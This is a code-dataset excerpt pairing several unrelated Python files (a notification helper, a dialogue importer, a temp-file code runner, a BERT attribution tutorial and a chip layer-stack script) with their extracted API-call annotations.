code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
#Title: Notification Processor
#Tags:plyer,python
#Can process notification of your choice
#plyer:built in module help you to find more information
from plyer import notification
def notifyme(title, message):
notification.notify(
title=title,
message=message,
app_icon='Write your icon address here',
timeout=5
)
notifyme("Title of notification box", "Message in notification")
| [
"plyer.notification.notify"
] | [((220, 326), 'plyer.notification.notify', 'notification.notify', ([], {'title': 'title', 'message': 'message', 'app_icon': '"""Write your icon address here"""', 'timeout': '(5)'}), "(title=title, message=message, app_icon=\n 'Write your icon address here', timeout=5)\n", (239, 326), False, 'from plyer import notification\n')] |
import logging
from threading import Thread
from time import sleep
from multipledispatch import dispatch
from dialogue_state import DialogueState
from modules.dialogue_recorder import DialogueRecorder
from modules.forward_planner import ForwardPlanner
class DialogueImporter(Thread):
"""
Functionality to import a previously recorded dialogue in the dialogue system. The
import essentially "replays" the previous interaction, including all state update
operations.
"""
# logger
log = logging.getLogger('PyOpenDial')
def __init__(self, system, turns):
"""
Creates a new dialogue importer attached to a particular dialogue system, and
with an ordered list of turns (encoded by their dialogue state).
:param system: the dialogue system
:param turns: the sequence of turns
"""
self.system = system
self.turns = turns
self.wizard_of_mode = False
@dispatch(bool)
def set_wizard_of_oz_mode(self, is_wizard_of_oz):
"""
Sets whether the import should consider the system actions as "expert"
Wizard-of-Oz actions to imitate.
:param is_wizard_of_oz: whether the system actions are wizard-of-Oz examples
"""
self.wizard_of_mode = is_wizard_of_oz
@dispatch()
def run(self):
if self.wizard_of_mode:
# TODO: WizardLearner
# self.system.attach_module(WizardLearner)
# for turn in self.turns:
# self.add_turn(turn)
pass
else:
self.system.detach_module(ForwardPlanner)
for turn in self.turns:
self.add_turn(turn)
self.system.get_state().remove_nodes(self.system.get_state().get_action_node_ids())
self.system.get_state().remove_nodes(self.system.get_state().get_utility_node_ids())
self.system.attach_module(ForwardPlanner)
@dispatch(DialogueState)
def add_turn(self, turn):
try:
while self.system.is_pauesd() or not self.system.get_module(DialogueRecorder).is_running():
try:
# TODO: Thread
sleep(100)
except:
pass
self.system.add_content(turn.copy())
except Exception as e:
self.log.warning("could not add content: %s" % e)
| [
"logging.getLogger",
"multipledispatch.dispatch",
"time.sleep"
] | [((517, 548), 'logging.getLogger', 'logging.getLogger', (['"""PyOpenDial"""'], {}), "('PyOpenDial')\n", (534, 548), False, 'import logging\n'), ((958, 972), 'multipledispatch.dispatch', 'dispatch', (['bool'], {}), '(bool)\n', (966, 972), False, 'from multipledispatch import dispatch\n'), ((1317, 1327), 'multipledispatch.dispatch', 'dispatch', ([], {}), '()\n', (1325, 1327), False, 'from multipledispatch import dispatch\n'), ((1962, 1985), 'multipledispatch.dispatch', 'dispatch', (['DialogueState'], {}), '(DialogueState)\n', (1970, 1985), False, 'from multipledispatch import dispatch\n'), ((2209, 2219), 'time.sleep', 'sleep', (['(100)'], {}), '(100)\n', (2214, 2219), False, 'from time import sleep\n')] |
import os, sys, subprocess, tempfile, time
# 创建临时文件夹,返回临时文件夹路径
TempFile = tempfile.mkdtemp(suffix='_test', prefix='python_')
# 文件名
FileNum = int(time.time() * 1000)
# python编译器位置
EXEC = sys.executable
# 获取python版本
def get_version():
v = sys.version_info
version = "python %s.%s" % (v.major, v.minor)
return version
# 获得py文件名
def get_pyname():
global FileNum
return 'test_%d' % FileNum
# 接收代码写入文件
def write_file(pyname, code):
fpath = os.path.join(TempFile, '%s.py' % pyname)
with open(fpath, 'w', encoding='utf-8') as f:
f.write(code)
print('file path: %s' % fpath)
return fpath
# 编码
def decode(s):
try:
return s.decode('utf-8')
except UnicodeDecodeError:
return s.decode('gbk')
# 主执行函数
def main(code):
r = dict()
r["version"] = get_version()
pyname = get_pyname()
fpath = write_file(pyname, code)
try:
# subprocess.check_output 是 父进程等待子进程完成,返回子进程向标准输出的输出结果
# stderr是标准输出的类型
# subprocess.check_output 执行一条shell命令
outdata = decode(subprocess.check_output([EXEC, fpath], stderr=subprocess.STDOUT, timeout=10))
except subprocess.CalledProcessError as e:
# e.output是错误信息标准输出
# 错误返回的数据
r["code"] = 'Error'
r["output"] = decode(e.output)
return r
else:
# 成功返回的数据
r['output'] = outdata
r["code"] = "Success"
return r
finally:
# 删除文件(其实不用删除临时文件会自动删除)
try:
os.remove(fpath)
except Exception as e:
exit(1)
if __name__ == '__main__':
code = "print(11);print(12)"
print(main(code))
| [
"subprocess.check_output",
"os.path.join",
"tempfile.mkdtemp",
"time.time",
"os.remove"
] | [((75, 125), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'suffix': '"""_test"""', 'prefix': '"""python_"""'}), "(suffix='_test', prefix='python_')\n", (91, 125), False, 'import os, sys, subprocess, tempfile, time\n'), ((465, 505), 'os.path.join', 'os.path.join', (['TempFile', "('%s.py' % pyname)"], {}), "(TempFile, '%s.py' % pyname)\n", (477, 505), False, 'import os, sys, subprocess, tempfile, time\n'), ((146, 157), 'time.time', 'time.time', ([], {}), '()\n', (155, 157), False, 'import os, sys, subprocess, tempfile, time\n'), ((1070, 1146), 'subprocess.check_output', 'subprocess.check_output', (['[EXEC, fpath]'], {'stderr': 'subprocess.STDOUT', 'timeout': '(10)'}), '([EXEC, fpath], stderr=subprocess.STDOUT, timeout=10)\n', (1093, 1146), False, 'import os, sys, subprocess, tempfile, time\n'), ((1500, 1516), 'os.remove', 'os.remove', (['fpath'], {}), '(fpath)\n', (1509, 1516), False, 'import os, sys, subprocess, tempfile, time\n')] |
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig
from captum.attr import visualization as viz
from captum.attr import LayerConductance, LayerIntegratedGradients
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model_path = "<PATH-TO-SAVED-MODEL>"
model = BertForQuestionAnswering.from_pretrained(model_path)
model.to(device)
model.eval()
model.zero_grad()
tokenizer = BertTokenizer.from_pretrained(model_path)
def predict(inputs, token_type_ids=None, position_ids=None, attention_mask=None):
output = model(
inputs,
token_type_ids=token_type_ids,
position_ids=position_ids,
attention_mask=attention_mask,
)
return output.start_logits, output.end_logits
def squad_pos_forward_func(inputs, token_type_ids=None, position_ids=None, attention_mask=None, position=0):
pred = predict(inputs, token_type_ids=token_type_ids, position_ids=position_ids, attention_mask=attention_mask)
pred = pred[position]
return pred.max(1).values
ref_token_id = tokenizer.pad_token_id
sep_token_id = tokenizer.sep_token_id
cls_token_id = tokenizer.cls_token_id
def construct_input_ref_pair(question, text, ref_token_id, sep_token_id, cls_token_id):
question_ids = tokenizer.encode(question, add_special_tokens=False)
text_ids = tokenizer.encode(text, add_special_tokens=False)
input_ids = [cls_token_id] + question_ids + [sep_token_id] + text_ids + [sep_token_id]
ref_input_ids = (
[cls_token_id]
+ [ref_token_id] * len(question_ids)
+ [sep_token_id]
+ [ref_token_id] * len(text_ids)
+ [sep_token_id]
)
return torch.tensor([input_ids], device=device), torch.tensor([ref_input_ids], device=device), len(question_ids)
def construct_input_ref_token_type_pair(input_ids, sep_ind=0):
seq_len = input_ids.size(1)
token_type_ids = torch.tensor([[0 if i <= sep_ind else 1 for i in range(seq_len)]], device=device)
ref_token_type_ids = torch.zeros_like(token_type_ids, device=device)
return token_type_ids, ref_token_type_ids
def construct_input_ref_pos_id_pair(input_ids):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=device)
ref_position_ids = torch.zeros(seq_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
ref_position_ids = ref_position_ids.unsqueeze(0).expand_as(input_ids)
return position_ids, ref_position_ids
def construct_attention_mask(input_ids):
return torch.ones_like(input_ids)
def construct_whole_bert_embeddings(
input_ids, ref_input_ids, token_type_ids=None, ref_token_type_ids=None, position_ids=None, ref_position_ids=None
):
input_embeddings = model.bert.embeddings(input_ids, token_type_ids=token_type_ids, position_ids=position_ids)
ref_input_embeddings = model.bert.embeddings(
ref_input_ids, token_type_ids=ref_token_type_ids, position_ids=ref_position_ids
)
return input_embeddings, ref_input_embeddings
question, text = (
"What is important to us?",
"It is important to us to include, empower and support humans of all kinds.",
)
input_ids, ref_input_ids, sep_id = construct_input_ref_pair(question, text, ref_token_id, sep_token_id, cls_token_id)
token_type_ids, ref_token_type_ids = construct_input_ref_token_type_pair(input_ids, sep_id)
position_ids, ref_position_ids = construct_input_ref_pos_id_pair(input_ids)
attention_mask = construct_attention_mask(input_ids)
indices = input_ids[0].detach().tolist()
all_tokens = tokenizer.convert_ids_to_tokens(indices)
ground_truth = "to include, empower and support humans of all kinds"
ground_truth_tokens = tokenizer.encode(ground_truth, add_special_tokens=False)
ground_truth_end_ind = indices.index(ground_truth_tokens[-1])
ground_truth_start_ind = ground_truth_end_ind - len(ground_truth_tokens) + 1
start_scores, end_scores = predict(
input_ids, token_type_ids=token_type_ids, position_ids=position_ids, attention_mask=attention_mask
)
print("Question: ", question)
print("Predicted Answer: ", " ".join(all_tokens[torch.argmax(start_scores) : torch.argmax(end_scores) + 1]))
lig = LayerIntegratedGradients(squad_pos_forward_func, model.bert.embeddings)
attributions_start, delta_start = lig.attribute(
inputs=input_ids,
baselines=ref_input_ids,
additional_forward_args=(token_type_ids, position_ids, attention_mask, 0),
return_convergence_delta=True,
)
attributions_end, delta_end = lig.attribute(
inputs=input_ids,
baselines=ref_input_ids,
additional_forward_args=(token_type_ids, position_ids, attention_mask, 1),
return_convergence_delta=True,
)
def summarize_attributions(attributions):
attributions = attributions.sum(dim=-1).squeeze(0)
attributions = attributions / torch.norm(attributions)
return attributions
attributions_start_sum = summarize_attributions(attributions_start)
attributions_end_sum = summarize_attributions(attributions_end)
start_position_vis = viz.VisualizationDataRecord(
attributions_start_sum,
torch.max(torch.softmax(start_scores[0], dim=0)),
torch.argmax(start_scores),
torch.argmax(start_scores),
str(ground_truth_start_ind),
attributions_start_sum.sum(),
all_tokens,
delta_start,
)
end_position_vis = viz.VisualizationDataRecord(
attributions_end_sum,
torch.max(torch.softmax(end_scores[0], dim=0)),
torch.argmax(end_scores),
torch.argmax(end_scores),
str(ground_truth_end_ind),
attributions_end_sum.sum(),
all_tokens,
delta_end,
)
print("\033[1m", "Visualizations For Start Position", "\033[0m")
viz.visualize_text([start_position_vis])
print("\033[1m", "Visualizations For End Position", "\033[0m")
viz.visualize_text([end_position_vis])
from IPython.display import Image
Image(filename="img/bert/visuals_of_start_end_predictions.png")
lig2 = LayerIntegratedGradients(
squad_pos_forward_func,
[
model.bert.embeddings.word_embeddings,
model.bert.embeddings.token_type_embeddings,
model.bert.embeddings.position_embeddings,
],
)
attributions_start = lig2.attribute(
inputs=(input_ids, token_type_ids, position_ids),
baselines=(ref_input_ids, ref_token_type_ids, ref_position_ids),
additional_forward_args=(attention_mask, 0),
)
attributions_end = lig2.attribute(
inputs=(input_ids, token_type_ids, position_ids),
baselines=(ref_input_ids, ref_token_type_ids, ref_position_ids),
additional_forward_args=(attention_mask, 1),
)
attributions_start_word = summarize_attributions(attributions_start[0])
attributions_end_word = summarize_attributions(attributions_end[0])
attributions_start_token_type = summarize_attributions(attributions_start[1])
attributions_end_token_type = summarize_attributions(attributions_end[1])
attributions_start_position = summarize_attributions(attributions_start[2])
attributions_end_position = summarize_attributions(attributions_end[2])
def get_topk_attributed_tokens(attrs, k=5):
values, indices = torch.topk(attrs, k)
top_tokens = [all_tokens[idx] for idx in indices]
return top_tokens, values, indices
top_words_start, top_words_val_start, top_word_ind_start = get_topk_attributed_tokens(attributions_start_word)
top_words_end, top_words_val_end, top_words_ind_end = get_topk_attributed_tokens(attributions_end_word)
top_token_type_start, top_token_type_val_start, top_token_type_ind_start = get_topk_attributed_tokens(
attributions_start_token_type
)
top_token_type_end, top_token_type_val_end, top_token_type_ind_end = get_topk_attributed_tokens(
attributions_end_token_type
)
top_pos_start, top_pos_val_start, pos_ind_start = get_topk_attributed_tokens(attributions_start_position)
top_pos_end, top_pos_val_end, pos_ind_end = get_topk_attributed_tokens(attributions_end_position)
df_start = pd.DataFrame(
{
"Word(Index), Attribution": [
"{} ({}), {}".format(word, pos, round(val.item(), 2))
for word, pos, val in zip(top_words_start, top_word_ind_start, top_words_val_start)
],
"Token Type(Index), Attribution": [
"{} ({}), {}".format(ttype, pos, round(val.item(), 2))
for ttype, pos, val in zip(top_token_type_start, top_token_type_ind_start, top_words_val_start)
],
"Position(Index), Attribution": [
"{} ({}), {}".format(position, pos, round(val.item(), 2))
for position, pos, val in zip(top_pos_start, pos_ind_start, top_pos_val_start)
],
}
)
df_start.style.apply(["cell_ids: False"])
df_end = pd.DataFrame(
{
"Word(Index), Attribution": [
"{} ({}), {}".format(word, pos, round(val.item(), 2))
for word, pos, val in zip(top_words_end, top_words_ind_end, top_words_val_end)
],
"Token Type(Index), Attribution": [
"{} ({}), {}".format(ttype, pos, round(val.item(), 2))
for ttype, pos, val in zip(top_token_type_end, top_token_type_ind_end, top_words_val_end)
],
"Position(Index), Attribution": [
"{} ({}), {}".format(position, pos, round(val.item(), 2))
for position, pos, val in zip(top_pos_end, pos_ind_end, top_pos_val_end)
],
}
)
df_end.style.apply(["cell_ids: False"])
["{}({})".format(token, str(i)) for i, token in enumerate(all_tokens)]
df_start
df_end
def squad_pos_forward_func2(input_emb, attention_mask=None, position=0):
pred = model(
inputs_embeds=input_emb,
attention_mask=attention_mask,
)
pred = pred[position]
return pred.max(1).values
layer_attrs_start = []
layer_attrs_end = []
token_to_explain = 23
layer_attrs_start_dist = []
layer_attrs_end_dist = []
input_embeddings, ref_input_embeddings = construct_whole_bert_embeddings(
input_ids,
ref_input_ids,
token_type_ids=token_type_ids,
ref_token_type_ids=ref_token_type_ids,
position_ids=position_ids,
ref_position_ids=ref_position_ids,
)
for i in range(model.config.num_hidden_layers):
lc = LayerConductance(squad_pos_forward_func2, model.bert.encoder.layer[i])
layer_attributions_start = lc.attribute(
inputs=input_embeddings, baselines=ref_input_embeddings, additional_forward_args=(attention_mask, 0)
)
layer_attributions_end = lc.attribute(
inputs=input_embeddings, baselines=ref_input_embeddings, additional_forward_args=(attention_mask, 1)
)
layer_attrs_start.append(summarize_attributions(layer_attributions_start).cpu().detach().tolist())
layer_attrs_end.append(summarize_attributions(layer_attributions_end).cpu().detach().tolist())
layer_attrs_start_dist.append(layer_attributions_start[0, token_to_explain, :].cpu().detach().tolist())
layer_attrs_end_dist.append(layer_attributions_end[0, token_to_explain, :].cpu().detach().tolist())
fig, ax = plt.subplots(figsize=(15, 5))
xticklabels = all_tokens
yticklabels = list(range(1, 13))
ax = sns.heatmap(np.array(layer_attrs_start), xticklabels=xticklabels, yticklabels=yticklabels, linewidth=0.2)
plt.xlabel("Tokens")
plt.ylabel("Layers")
plt.show()
fig, ax = plt.subplots(figsize=(15, 5))
xticklabels = all_tokens
yticklabels = list(range(1, 13))
ax = sns.heatmap(np.array(layer_attrs_end), xticklabels=xticklabels, yticklabels=yticklabels, linewidth=0.2)
plt.xlabel("Tokens")
plt.ylabel("Layers")
plt.show()
fig, ax = plt.subplots(figsize=(20, 10))
ax = sns.boxplot(data=layer_attrs_start_dist)
plt.xlabel("Layers")
plt.ylabel("Attribution")
plt.show()
fig, ax = plt.subplots(figsize=(20, 10))
ax = sns.boxplot(data=layer_attrs_end_dist)
plt.xlabel("Layers")
plt.ylabel("Attribution")
plt.show()
def pdf_attr(attrs, bins=100):
return np.histogram(attrs, bins=bins, density=True)[0]
layer_attrs_end_pdf = map(lambda layer_attrs_end_dist: pdf_attr(layer_attrs_end_dist), layer_attrs_end_dist)
layer_attrs_end_pdf = np.array(list(layer_attrs_end_pdf))
attr_sum = np.array(layer_attrs_end_dist).sum(-1)
layer_attrs_end_pdf_norm = np.linalg.norm(layer_attrs_end_pdf, axis=-1, ord=1)
layer_attrs_end_pdf = np.transpose(layer_attrs_end_pdf)
layer_attrs_end_pdf = np.divide(layer_attrs_end_pdf, layer_attrs_end_pdf_norm, where=layer_attrs_end_pdf_norm != 0)
fig, ax = plt.subplots(figsize=(20, 10))
plt.plot(layer_attrs_end_pdf)
plt.xlabel("Bins")
plt.ylabel("Density")
plt.legend(["Layer " + str(i) for i in range(1, 13)])
plt.show()
fig, ax = plt.subplots(figsize=(20, 10))
layer_attrs_end_pdf[layer_attrs_end_pdf == 0] = 1
layer_attrs_end_pdf_log = np.log2(layer_attrs_end_pdf)
entropies = -(layer_attrs_end_pdf * layer_attrs_end_pdf_log).sum(0)
plt.scatter(np.arange(12), attr_sum, s=entropies * 100)
plt.xlabel("Layers")
plt.ylabel("Total Attribution")
plt.show()
| [
"matplotlib.pyplot.ylabel",
"torch.softmax",
"numpy.array",
"torch.cuda.is_available",
"numpy.linalg.norm",
"torch.arange",
"numpy.divide",
"numpy.arange",
"numpy.histogram",
"captum.attr.LayerIntegratedGradients",
"matplotlib.pyplot.xlabel",
"IPython.display.Image",
"captum.attr.visualizati... | [((440, 492), 'transformers.BertForQuestionAnswering.from_pretrained', 'BertForQuestionAnswering.from_pretrained', (['model_path'], {}), '(model_path)\n', (480, 492), False, 'from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig\n'), ((554, 595), 'transformers.BertTokenizer.from_pretrained', 'BertTokenizer.from_pretrained', (['model_path'], {}), '(model_path)\n', (583, 595), False, 'from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig\n'), ((4349, 4420), 'captum.attr.LayerIntegratedGradients', 'LayerIntegratedGradients', (['squad_pos_forward_func', 'model.bert.embeddings'], {}), '(squad_pos_forward_func, model.bert.embeddings)\n', (4373, 4420), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((5814, 5854), 'captum.attr.visualization.visualize_text', 'viz.visualize_text', (['[start_position_vis]'], {}), '([start_position_vis])\n', (5832, 5854), True, 'from captum.attr import visualization as viz\n'), ((5919, 5957), 'captum.attr.visualization.visualize_text', 'viz.visualize_text', (['[end_position_vis]'], {}), '([end_position_vis])\n', (5937, 5957), True, 'from captum.attr import visualization as viz\n'), ((5994, 6057), 'IPython.display.Image', 'Image', ([], {'filename': '"""img/bert/visuals_of_start_end_predictions.png"""'}), "(filename='img/bert/visuals_of_start_end_predictions.png')\n", (5999, 6057), False, 'from IPython.display import Image\n'), ((6066, 6253), 'captum.attr.LayerIntegratedGradients', 'LayerIntegratedGradients', (['squad_pos_forward_func', '[model.bert.embeddings.word_embeddings, model.bert.embeddings.\n token_type_embeddings, model.bert.embeddings.position_embeddings]'], {}), '(squad_pos_forward_func, [model.bert.embeddings.\n word_embeddings, model.bert.embeddings.token_type_embeddings, model.\n bert.embeddings.position_embeddings])\n', (6090, 6253), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((11048, 11077), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 5)'}), '(figsize=(15, 5))\n', (11060, 11077), True, 'import matplotlib.pyplot as plt\n'), ((11247, 11267), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tokens"""'], {}), "('Tokens')\n", (11257, 11267), True, 'import matplotlib.pyplot as plt\n'), ((11268, 11288), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Layers"""'], {}), "('Layers')\n", (11278, 11288), True, 'import matplotlib.pyplot as plt\n'), ((11289, 11299), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11297, 11299), True, 'import matplotlib.pyplot as plt\n'), ((11311, 11340), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 5)'}), '(figsize=(15, 5))\n', (11323, 11340), True, 'import matplotlib.pyplot as plt\n'), ((11508, 11528), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tokens"""'], {}), "('Tokens')\n", (11518, 11528), True, 'import matplotlib.pyplot as plt\n'), ((11529, 11549), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Layers"""'], {}), "('Layers')\n", (11539, 11549), True, 'import matplotlib.pyplot as plt\n'), ((11550, 11560), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11558, 11560), True, 'import matplotlib.pyplot as plt\n'), ((11572, 11602), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (11584, 11602), True, 'import matplotlib.pyplot as plt\n'), ((11608, 11648), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'layer_attrs_start_dist'}), '(data=layer_attrs_start_dist)\n', (11619, 11648), True, 'import seaborn as sns\n'), ((11649, 11669), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (11659, 11669), True, 'import matplotlib.pyplot as plt\n'), ((11670, 11695), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Attribution"""'], {}), "('Attribution')\n", (11680, 11695), True, 'import matplotlib.pyplot as plt\n'), ((11696, 11706), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11704, 11706), True, 'import matplotlib.pyplot as plt\n'), ((11718, 11748), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (11730, 11748), True, 'import matplotlib.pyplot as plt\n'), ((11754, 11792), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'layer_attrs_end_dist'}), '(data=layer_attrs_end_dist)\n', (11765, 11792), True, 'import seaborn as sns\n'), ((11793, 11813), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (11803, 11813), True, 'import matplotlib.pyplot as plt\n'), ((11814, 11839), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Attribution"""'], {}), "('Attribution')\n", (11824, 11839), True, 'import matplotlib.pyplot as plt\n'), ((11840, 11850), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11848, 11850), True, 'import matplotlib.pyplot as plt\n'), ((12190, 12241), 'numpy.linalg.norm', 'np.linalg.norm', (['layer_attrs_end_pdf'], {'axis': '(-1)', 'ord': '(1)'}), '(layer_attrs_end_pdf, axis=-1, ord=1)\n', (12204, 12241), True, 'import numpy as np\n'), ((12264, 12297), 'numpy.transpose', 'np.transpose', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12276, 12297), True, 'import numpy as np\n'), ((12320, 12418), 'numpy.divide', 'np.divide', (['layer_attrs_end_pdf', 'layer_attrs_end_pdf_norm'], {'where': '(layer_attrs_end_pdf_norm != 0)'}), '(layer_attrs_end_pdf, layer_attrs_end_pdf_norm, where=\n layer_attrs_end_pdf_norm != 0)\n', (12329, 12418), True, 'import numpy as np\n'), ((12425, 12455), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (12437, 12455), True, 'import matplotlib.pyplot as plt\n'), ((12456, 12485), 'matplotlib.pyplot.plot', 'plt.plot', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12464, 12485), True, 'import matplotlib.pyplot as plt\n'), ((12486, 12504), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Bins"""'], {}), "('Bins')\n", (12496, 12504), True, 'import matplotlib.pyplot as plt\n'), ((12505, 12526), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Density"""'], {}), "('Density')\n", (12515, 12526), True, 'import matplotlib.pyplot as plt\n'), ((12581, 12591), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12589, 12591), True, 'import matplotlib.pyplot as plt\n'), ((12603, 12633), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (12615, 12633), True, 'import matplotlib.pyplot as plt\n'), ((12710, 12738), 'numpy.log2', 'np.log2', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12717, 12738), True, 'import numpy as np\n'), ((12864, 12884), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (12874, 12884), True, 'import matplotlib.pyplot as plt\n'), ((12885, 12916), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Total Attribution"""'], {}), "('Total Attribution')\n", (12895, 12916), True, 'import matplotlib.pyplot as plt\n'), ((12917, 12927), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12925, 12927), True, 'import matplotlib.pyplot as plt\n'), ((2130, 2177), 'torch.zeros_like', 'torch.zeros_like', (['token_type_ids'], {'device': 'device'}), '(token_type_ids, device=device)\n', (2146, 2177), False, 'import torch\n'), ((2328, 2385), 'torch.arange', 'torch.arange', (['seq_length'], {'dtype': 'torch.long', 'device': 'device'}), '(seq_length, dtype=torch.long, device=device)\n', (2340, 2385), False, 'import torch\n'), ((2409, 2465), 'torch.zeros', 'torch.zeros', (['seq_length'], {'dtype': 'torch.long', 'device': 'device'}), '(seq_length, dtype=torch.long, device=device)\n', (2420, 2465), False, 'import torch\n'), ((2702, 2728), 'torch.ones_like', 'torch.ones_like', (['input_ids'], {}), '(input_ids)\n', (2717, 2728), False, 'import torch\n'), ((5303, 5329), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (5315, 5329), False, 'import torch\n'), ((5335, 5361), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (5347, 5361), False, 'import torch\n'), ((5596, 5620), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (5608, 5620), False, 'import torch\n'), ((5626, 5650), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (5638, 5650), False, 'import torch\n'), ((7218, 7238), 'torch.topk', 'torch.topk', (['attrs', 'k'], {}), '(attrs, k)\n', (7228, 7238), False, 'import torch\n'), ((10234, 10304), 'captum.attr.LayerConductance', 'LayerConductance', (['squad_pos_forward_func2', 'model.bert.encoder.layer[i]'], {}), '(squad_pos_forward_func2, model.bert.encoder.layer[i])\n', (10250, 10304), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((11153, 11180), 'numpy.array', 'np.array', (['layer_attrs_start'], {}), '(layer_attrs_start)\n', (11161, 11180), True, 'import numpy as np\n'), ((11416, 11441), 'numpy.array', 'np.array', (['layer_attrs_end'], {}), '(layer_attrs_end)\n', (11424, 11441), True, 'import numpy as np\n'), ((12820, 12833), 'numpy.arange', 'np.arange', (['(12)'], {}), '(12)\n', (12829, 12833), True, 'import numpy as np\n'), ((355, 380), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (378, 380), False, 'import torch\n'), ((1799, 1839), 'torch.tensor', 'torch.tensor', (['[input_ids]'], {'device': 'device'}), '([input_ids], device=device)\n', (1811, 1839), False, 'import torch\n'), ((1841, 1885), 'torch.tensor', 'torch.tensor', (['[ref_input_ids]'], {'device': 'device'}), '([ref_input_ids], device=device)\n', (1853, 1885), False, 'import torch\n'), ((4983, 5007), 'torch.norm', 'torch.norm', (['attributions'], {}), '(attributions)\n', (4993, 5007), False, 'import torch\n'), ((5259, 5296), 'torch.softmax', 'torch.softmax', (['start_scores[0]'], {'dim': '(0)'}), '(start_scores[0], dim=0)\n', (5272, 5296), False, 'import torch\n'), ((5554, 5589), 'torch.softmax', 'torch.softmax', (['end_scores[0]'], {'dim': '(0)'}), '(end_scores[0], dim=0)\n', (5567, 5589), False, 'import torch\n'), ((11895, 11939), 'numpy.histogram', 'np.histogram', (['attrs'], {'bins': 'bins', 'density': '(True)'}), '(attrs, bins=bins, density=True)\n', (11907, 11939), True, 'import numpy as np\n'), ((12124, 12154), 'numpy.array', 'np.array', (['layer_attrs_end_dist'], {}), '(layer_attrs_end_dist)\n', (12132, 12154), True, 'import numpy as np\n'), ((4281, 4307), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (4293, 4307), False, 'import torch\n'), ((4310, 4334), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (4322, 4334), False, 'import torch\n')] |
#!/bin/env python
# import the technology's complete stack definition
from example import stack
# in order to decrease simulation times, some metal layers can be removed from
# the stack, allowing more oxide layers to be merged in the next step
stack.remove_metal_layer_by_name('PO1')
stack.remove_metal_layer_by_name('ME1')
stack.remove_metal_layer_by_name('ME2')
stack.remove_metal_layer_by_name('ME3')
stack.remove_metal_layer_by_name('ME4')
#stack.remove_metal_layer_by_name('ME5')
#stack.remove_metal_layer_by_name('ME6')
if __name__ == '__main__':
# Print the standardized stack to example_ME5ME6_std.pdf
stack.draw('example_ME5ME6_std', pages=3, single_page=True)
# Merge oxide layers to reduce the stack's complexity, decreasing simulation
# times
stack.simplify()
if __name__ == '__main__':
# Print the simplified stack to example_ME5ME6.pdf
stack.draw('example_ME5ME6', pages=3, single_page=True)
# Write out a Momentum subtrate definition file of the simplified stack
# write_momentum_substrate argument: filename (without extension),
# infinite ground plane
# NOTE: this might produce bad output when the stack has not been
# simplified before!
stack.write_momentum_substrate('example_ME5ME6', True)
# Write out a Sonnet project that includes the simplified subtrate stack
# write_sonnet_technology argument: filename (without extension)
# NOTE: this might produce bad output when the stack has not been
# simplified before!
stack.write_sonnet_technology('example_ME5ME6')
| [
"example.stack.simplify",
"example.stack.write_momentum_substrate",
"example.stack.remove_metal_layer_by_name",
"example.stack.draw",
"example.stack.write_sonnet_technology"
